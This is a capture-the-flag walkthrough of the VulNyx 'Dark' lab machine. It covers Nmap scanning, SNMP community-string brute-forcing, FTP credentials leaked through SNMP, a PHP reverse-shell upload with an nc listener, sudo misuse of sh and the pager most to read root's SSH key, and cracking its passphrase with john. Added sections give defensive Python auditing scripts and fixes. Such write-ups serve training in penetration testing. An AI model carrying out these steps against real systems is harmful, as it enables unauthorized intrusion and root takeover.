VulNyx-Dark

Port scanning

kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 192.168.41.139                                                                                [21:56:56]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-08 21:57 CST
Nmap scan report for 192.168.41.139
Host is up (0.0020s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8000/tcp open http-alt
MAC Address: 00:0C:29:54:27:1B (VMware)
kali@kali [~] ➜  sudo nmap -sT -sV -sC -O -p22,80,8000 192.168.41.139                                                                            [21:57:27]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-08 21:57 CST
Nmap scan report for 192.168.41.139
Host is up (0.00041s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-title: Dark
|_http-server-header: Apache/2.4.56 (Debian)
8000/tcp open ftp pyftpdlib 1.5.7
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.41.139:8000
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
MAC Address: 00:0C:29:54:27:1B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.15 seconds

Port 8000 is an FTP service, and it looks like it was started from Python.

kali@kali [~] ➜  sudo nmap -sU --top-ports 20 192.168.41.139                                                                                     [22:01:13]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-08 22:01 CST
Nmap scan report for 192.168.41.139
Host is up (0.00043s latency).

PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
123/udp open|filtered ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp open snmp
162/udp open|filtered snmptrap
445/udp closed microsoft-ds
500/udp open|filtered isakmp
514/udp closed syslog
520/udp closed route
631/udp open|filtered ipp
1434/udp open|filtered ms-sql-m
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
49152/udp closed unknown
MAC Address: 00:0C:29:54:27:1B (VMware)

One UDP port is open here: SNMP.

The core purpose of SNMP is to let you remotely monitor, manage and control the running state of network devices; it is a very important part of operations and network management.

It is something like a monitoring platform. Note that the older SNMP versions (v1/v2c) use a plaintext community string (such as public or private) as the "password", which offers poor security.
The newer SNMPv3 provides proper authentication and encryption.

This so-called password is just a string, and it can be brute-forced.

Attacking the services

kali@kali [~] ➜  ftp 192.168.41.139 8000                                                                                                         [22:01:38]
Connected to 192.168.41.139.
220 pyftpdlib 1.5.7 ready.
Name (192.168.41.139:kali): anonymous
331 Username ok, send password.
Password:
530 Anonymous access not allowed.
ftp: Login failed
ftp>

For a Python-started FTP service like this, the username and password are written directly into the command, so anonymous login is unlikely; set this aside for now.

Focus on SNMP over UDP instead; it can leak information.

msf6 > use auxiliary/scanner/snmp/snmp_login

Use the module that msf provides for brute-forcing the SNMP community string (the "login password").

msf6 auxiliary(scanner/snmp/snmp_login) > set RHOSTS 192.168.41.139
RHOSTS => 192.168.41.139
msf6 auxiliary(scanner/snmp/snmp_login) > run

[!] No active DB -- Credential data will not be saved!
[+] 192.168.41.139:161 - Login Successful: root (Access level: read-only); Proof (sysDescr.0): Linux dark 5.10.0-23-amd64 #1 SMP Debian 5.10.179-3 (2023-07-27) x86_64
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/snmp/snmp_login) >

After reviewing the required options with info and setting the target address, the run shows that the community string that works is root.

kali@kali [~] ➜  snmpwalk -v 2c -c root 192.168.41.139 > 1  

Run snmpwalk with the version set to 2c; -c [community] specifies SNMP's so-called "password", which is why we brute-forced it.

kali@kali [~] ➜  cat 1 | awk '/8000/{print $0}'                                                                                                  [22:14:21] 
iso.3.6.1.2.1.6.13.1.1.0.0.0.0.8000.0.0.0.0.0 = INTEGER: 2
iso.3.6.1.2.1.6.13.1.2.0.0.0.0.8000.0.0.0.0.0 = IpAddress: 0.0.0.0
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.8000.0.0.0.0.0 = INTEGER: 8000
iso.3.6.1.2.1.6.13.1.4.0.0.0.0.8000.0.0.0.0.0 = IpAddress: 0.0.0.0
iso.3.6.1.2.1.6.13.1.5.0.0.0.0.8000.0.0.0.0.0 = INTEGER: 0
iso.3.6.1.2.1.6.20.1.4.1.4.0.0.0.0.8000 = Gauge32: 0
iso.3.6.1.2.1.25.4.2.1.5.522 = STRING: "-c /usr/bin/python3 -m pyftpdlib -p 8000 -w -d /var/www/html/ -u frank -P my_FTP_is_c00l"
iso.3.6.1.2.1.25.4.2.1.5.528 = STRING: "-m pyftpdlib -p 8000 -w -d /var/www/html/ -u frank -P my_FTP_is_c00l"

This gives us the username and password: frank and my_FTP_is_c00l.
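The lines that leaked the credentials come from hrSWRunParameters (HOST-RESOURCES-MIB, OID 1.3.6.1.2.1.25.4.2.1.5), the table of per-process argument strings that read-only SNMP access exposes. The following is an added example, not part of the original write-up: a small audit script that parses snmpwalk output in the textual format shown above and flags process arguments that look like secrets, so a defender can check their own hosts before an attacker does. The flag and key lists are assumptions (kept case-sensitive because pyftpdlib's -p is the port and -P the password); the sample walk is constructed from the lines above plus a few benign ones.

```python
import re
import shlex

# hrSWRunParameters (HOST-RESOURCES-MIB): one entry per PID holding the
# process's argument string, exactly what snmpwalk dumped on this box.
HR_SW_RUN_PARAMETERS = "iso.3.6.1.2.1.25.4.2.1.5."

# Heuristics (assumed list, case-sensitive: pyftpdlib's -p is the port,
# -P the password). Extend for the tools running in your environment.
SECRET_FLAGS = {"-P", "--password", "--pass", "--passwd"}
SECRET_KEYS = ("password=", "passwd=", "pass=", "token=", "secret=")

LINE_RE = re.compile(r'^(?P<oid>\S+) = STRING: "(?P<value>.*)"$')


def find_leaked_secrets(snmpwalk_output):
    """Return (pid, flag_or_key, secret) for process args that look like secrets."""
    hits = []
    for line in snmpwalk_output.splitlines():
        m = LINE_RE.match(line.strip())
        if not m or not m.group("oid").startswith(HR_SW_RUN_PARAMETERS):
            continue
        pid = int(m.group("oid")[len(HR_SW_RUN_PARAMETERS):])
        try:
            args = shlex.split(m.group("value"))
        except ValueError:  # unbalanced quotes in the argument string
            args = m.group("value").split()
        for i, arg in enumerate(args):
            if arg in SECRET_FLAGS and i + 1 < len(args):
                hits.append((pid, arg, args[i + 1]))
            bare = arg.lstrip("-").lower()  # "--token=x" -> "token=x"
            key = next((k for k in SECRET_KEYS if bare.startswith(k)), None)
            if key:
                hits.append((pid, key.rstrip("="), arg[len(arg) - len(bare) + len(key):]))
    return hits


# Constructed sample: the two hrSWRunParameters lines from the walk above plus
# a TCP-table line and benign processes, to show that only secrets are flagged.
SAMPLE_WALK = """\
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.8000.0.0.0.0.0 = INTEGER: 8000
iso.3.6.1.2.1.25.4.2.1.5.1 = STRING: ""
iso.3.6.1.2.1.25.4.2.1.5.440 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.522 = STRING: "-c /usr/bin/python3 -m pyftpdlib -p 8000 -w -d /var/www/html/ -u frank -P my_FTP_is_c00l"
iso.3.6.1.2.1.25.4.2.1.5.528 = STRING: "-m pyftpdlib -p 8000 -w -d /var/www/html/ -u frank -P my_FTP_is_c00l"
iso.3.6.1.2.1.25.4.2.1.5.610 = STRING: "--url https://example.invalid --token=abc123"
"""

if __name__ == "__main__":
    for pid, where, secret in find_leaked_secrets(SAMPLE_WALK):
        print(f"PID {pid}: {where} exposes {secret[:3]}*** via SNMP")
```

The fix on the host side is to pass secrets through a config file or environment rather than argv, and to restrict the SNMP community (or move to SNMPv3) so the process table is not readable by whoever guesses the string.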

kali@kali [~] ➜  ftp 192.168.41.139 8000                                                                                                         [22:20:32]
Connected to 192.168.41.139.
220 pyftpdlib 1.5.7 ready.
Name (192.168.41.139:kali): frank
331 Username ok, send password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering extended passive mode (|||45031|).
125 Data connection already open. Transfer starting.
-rw------- 1 frank frank 219 Aug 01 2023 index.html
226 Transfer complete.
ftp> put shell_web.php
local: shell_web.php remote: shell_web.php
229 Entering extended passive mode (|||45501|).
125 Data connection already open. Transfer starting.
100% |***************************************************************************************************************| 81 209.26 KiB/s 00:00 ETA
226 Transfer complete.
81 bytes sent in 00:00 (55.58 KiB/s)
ftp>

Simply upload a reverse shell.

kali@kali [~] ➜  nc -lvnp 8888                                                                                                                   [22:22:45]
listening on [any] 8888 ...
frank@dark:/var/www/html$

A note on port 80: I also scanned it extensively with no result, so I moved on to the other ports.

Privilege escalation

frank@dark:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for frank on dark:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User frank may run the following commands on dark:
(alan) NOPASSWD: /usr/bin/sh
frank@dark:/var/www/html$ sudo -u alan /usr/bin/sh
sudo -u alan /usr/bin/sh
id
uid=1001(alan) gid=1001(alan) groups=1001(alan)

After getting a regular user, try writing a public key into the account to obtain a stable shell.

echo "ssh-rsa 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 your_email@example.com" >authorized_keys
pwd
/home/alan/.ssh
ls
authorized_keys
alan@dark:~$ sudo -l
Matching Defaults entries for alan on dark:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User alan may run the following commands on dark:
(root) NOPASSWD: /usr/bin/most
alan@dark:~$ most -h
most: invalid switch h ignored.
MOST version 5.0.0 (S-Lang version 2.3.2)
Usage:
most [-1Cbcdkstvw] [+/string] [+line number] [+s] [+d] file...
where: -1: assume VT100 terminal. (VMS only)
-b: Startup in binary mode.
-C: disable color support
-c: Make searches case sensitive.
-d: Do not display the \ wrap marker when wrapping lines.
-M: Do not attempt to mmap files.
-s: Squeeze out excess blank lines.
-t: Display tabs as ^I. If this option is immediately followed
by an integer, the integer sets the tab width.
-u: Disable UTF-8 mode
-v: Do not interpret backspace formatting characters.
-w: Wrap lines.
-z: No gunzip-on-the-fly.
+/string:
Search for string
+line number
Start up at specified line number.
+d: Allow file deletion.
+s: Secure Mode-- no edit, cd, shell, and reading files not
already listed on the command line.
+u: Enable UTF-8 mode.

Example: most -ct4 +82 keymap.c
makes searches case sensitive, sets tabwidth to 4, and displays the file
keymap.c starting at line 82

most is a pager for reading files, so just read root's private key directly.

alan@dark:~$ sudo /usr/bin/most /root/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,71FD7C202A6EE74C
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-----END RSA PRIVATE KEY-----

It is passphrase-protected, so let's crack it.

kali@kali [~] ➜  ssh2john x2 > tmp2                                                                                                              [22:31:36]
kali@kali [~] ➜ john tmp2 [22:31:40]
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 6 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
rootbeer (x2)
1g 0:00:00:00 DONE 2/3 (2025-05-08 22:31) 33.33g/s 85366p/s 85366c/s 85366C/s rockie..scorpion
Use the "--show" option to display all of the cracked passwords reliably
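The key above is in the legacy PEM encryption format ("Proc-Type: 4,ENCRYPTED" plus "DEK-Info: DES-EDE3-CBC"), in which the passphrase is stretched by a single MD5 pass, which is what john's "Cost 1 ... is 1" line reports, so a dictionary passphrase falls in well under a second. The following is an added example, not part of the write-up: it classifies a private key file by its header and reports cipher, KDF and rounds, treating the openssh-key-v1 layout (cipher name, KDF name, KDF options = salt + rounds) as the stronger alternative. Both sample keys are constructed: the PEM body is filler and the OpenSSH blob holds only the header fields the parser reads.

```python
import base64
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"

def read_str(blob, off):
    """Read one SSH wire 'string' (uint32 length + bytes) at offset off."""
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n], off + 4 + n

def pack_str(data):
    return struct.pack(">I", len(data)) + data

def classify_private_key(text):
    """Report format, cipher, passphrase KDF and whether that KDF is weak."""
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    header = lines[0] if lines else ""
    if header == "-----BEGIN OPENSSH PRIVATE KEY-----":
        blob = base64.b64decode("".join(lines[1:-1]))
        if not blob.startswith(OPENSSH_MAGIC):
            raise ValueError("not an openssh-key-v1 blob")
        cipher, off = read_str(blob, len(OPENSSH_MAGIC))
        kdf, off = read_str(blob, off)
        kdfopts, _ = read_str(blob, off)
        rounds = None
        if kdf == b"bcrypt":  # kdfoptions = string salt, uint32 rounds
            _salt, o = read_str(kdfopts, 0)
            (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
        return {"format": "openssh", "encrypted": cipher != b"none",
                "cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": rounds,
                "weak_kdf": cipher != b"none" and kdf != b"bcrypt"}
    if header.endswith(" PRIVATE KEY-----") and "ENCRYPTED" not in header:
        # Legacy PEM: passphrase -> key by a single MD5 pass (EVP_BytesToKey).
        encrypted = "Proc-Type: 4,ENCRYPTED" in lines
        dek = next((l for l in lines if l.startswith("DEK-Info:")), "")
        cipher = dek.partition(":")[2].strip().split(",")[0] or None
        return {"format": "pem", "encrypted": encrypted, "cipher": cipher,
                "kdf": "md5" if encrypted else None,
                "rounds": 1 if encrypted else None, "weak_kdf": encrypted}
    raise ValueError("unrecognised or PKCS#8 private key header")

# Constructed sample 1: the header seen on the box; the body is filler.
LEGACY_PEM = ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
              "DEK-Info: DES-EDE3-CBC,71FD7C202A6EE74C\n\nQUJDREVGR0hJSktM\n"
              "-----END RSA PRIVATE KEY-----")

# Constructed sample 2: openssh-key-v1 prefix only (aes256-ctr, bcrypt, 16 rounds).
_blob = (OPENSSH_MAGIC + pack_str(b"aes256-ctr") + pack_str(b"bcrypt")
         + pack_str(pack_str(b"\x00" * 16) + b"\x00\x00\x00\x10"))
OPENSSH_SAMPLE = ("-----BEGIN OPENSSH PRIVATE KEY-----\n"
                  + base64.b64encode(_blob).decode() + "\n-----END OPENSSH PRIVATE KEY-----")
```

A key flagged with weak_kdf can be rewritten in place with `ssh-keygen -p -o -a 64 -f <key>`, which re-encrypts it in the OpenSSH format with 64 bcrypt rounds; the stronger fix is a passphrase that is not in a wordlist and not leaving the key readable through a sudo pager in the first place.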
kali@kali [~] ➜  chmod 600 x2                                                                                                                    [22:32:32]
kali@kali [~] ➜ ssh root@192.168.41.139 -i x2 [22:32:37]
Enter passphrase for key 'x2':
root@dark:~# id
uid=0(root) gid=0(root) grupos=0(root)
root@dark:~#